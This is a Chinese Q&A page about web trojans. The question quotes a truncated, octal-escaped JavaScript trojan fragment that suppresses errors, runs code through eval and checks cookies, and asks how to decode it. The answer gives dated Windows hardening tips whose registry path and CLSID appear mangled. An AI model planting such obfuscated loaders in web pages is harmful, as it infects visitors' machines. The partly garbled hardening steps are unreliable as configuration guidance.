这个网马采用的加密方式是什么?还原后的内容是什么

发布时间:2024-05-19 17:43 发布:上海旅游网

问题描述:

<html>
<script>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function(){return true;}
eval("\146\165\156\143\164\151\157\156\40\151\156\151\164\50\51\173\167\151\156\144\157\167\133\42\134\170\67\63\134\170\67\64\134\170\66\61\134\170\67\64\134\170\67\65\134\170\67\63\42\135\75\42\42\73\175\167\151\156\144\157\167\133\42\134\170\66\146\134\170\66\145\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\42\135\40\75\40\151\156\151\164\73\15\12\151\146\50\167\151\156\144\157\167\133\42\134\170\66\64\134\170\66\146\134\170\66\63\134\170\67\65\134\170\66\144\134\170\66\65\134\170\66\145\134\170\67\64\42\135\133\42\134\170\66\63\134\170\66\146\134\170\66\146\134\170\66\142\134\170\66\71\134\170\66\65\42\135\133\42\134\170\66\71\134\170\66\145\134\170\66\64\134\170\66\65\134\170\67\70\134\170\64\146\134\170\66\66\42\135\50\42\134\170\67\60\134\170\66\143\134\170\66\61\134\170\67\71\134\170\63\144\42

问题解答:

现在网页木马无非有以下几种方式种植到你的机器中:

1.把木马文件改成BMP文件,然后配合你机器里的DEBUG来还原成EXE,网上存在该木马(20%);2.下载一个TXT文件到你机器,然后里面有具体的FTP操作,FTP连上他们有木马的机器下载木马,网上存在该木马(20%);3.也是最常用的方式,下载一个HTA文件,然后用网页控件解释器来还原木马。该木马在网上存在(50%以上);4.采用JS脚本,用VBS脚本来执行木马文件,该型木马偷QQ和传奇等热门网游(大概占10%左右);5.其他未知方式。

而我们此处介绍的防范方法,那就是把 windowssystemmshta.exe文件(Windows XP/2000系统,该文件在system32下)改名,可改成你想到的任意名字。

HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility 下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD 类型的键Compatibility,并设定键值为0×00000400即可。

还有windowscommanddebug.exe和windowsftp.exe也都将其改名(或者删除)。

经过以上的修改后,找木马网址去测试,实验结果是上了大概20个木马网站,机器没有产生新的EXE文件,也没有新的进程出现,只不过有些木马的残骸留在了IE的临时文件夹里,它们并没有被执行,也就没有危险性。建议大家经常清理临时文件夹和IE。

针对一些最新流行木马的有效防御:

比如网络上流行的木马“smss.exe”,潜伏在 98/winme/xp c:windows目录下和2000 c:winnt目录下。假如你中了这个木马 首先我们用进程管理器结束正在运行的木马“smss.exe”,然后在C:windows 或 c:winnt目录下创建一个“smss.exe”并设置为只读属性(2000/XP NTFS的磁盘格式的话那就更好,可以用“安全设置” 设置为读取)。这样木马被清除,以后也不会再被感染。此办法经测试,对很多木马有效。

热点新闻